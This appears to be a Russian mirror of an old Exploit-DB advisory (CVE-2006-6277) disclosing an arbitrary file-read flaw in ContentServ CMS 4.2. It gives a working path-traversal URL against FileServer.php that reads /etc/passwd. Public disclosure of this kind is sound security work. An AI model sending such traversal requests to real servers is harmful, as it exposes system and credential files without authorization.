- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 2878
- Проверка EDB
-
- Пройдено
- Автор
- QOBAIASHI
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2006-6277
- Дата публикации
- 2006-12-01
Код:
ContentServ again (still) features remote reading of arbitrary files
====================================================================
ContentServ is a cms and "cross media publishing" software.
Let me quote from their website:
"At ContentServ, there is always something happening. We continously enhance our products and services.[...]"
Ok.
Now for the real fun remember:
http://archives.neohapsis.com/archives/fulldisclosure/2005-09/0650.html
Still with me? Ok. Lets forget the sql injections for a moment, what if we try:
http://somesite/contentserv/4.2/admin/FileServer.php?src=../../../../../etc/passwd
# milw0rm.com [2006-12-01]- Источник
- www.exploit-db.com
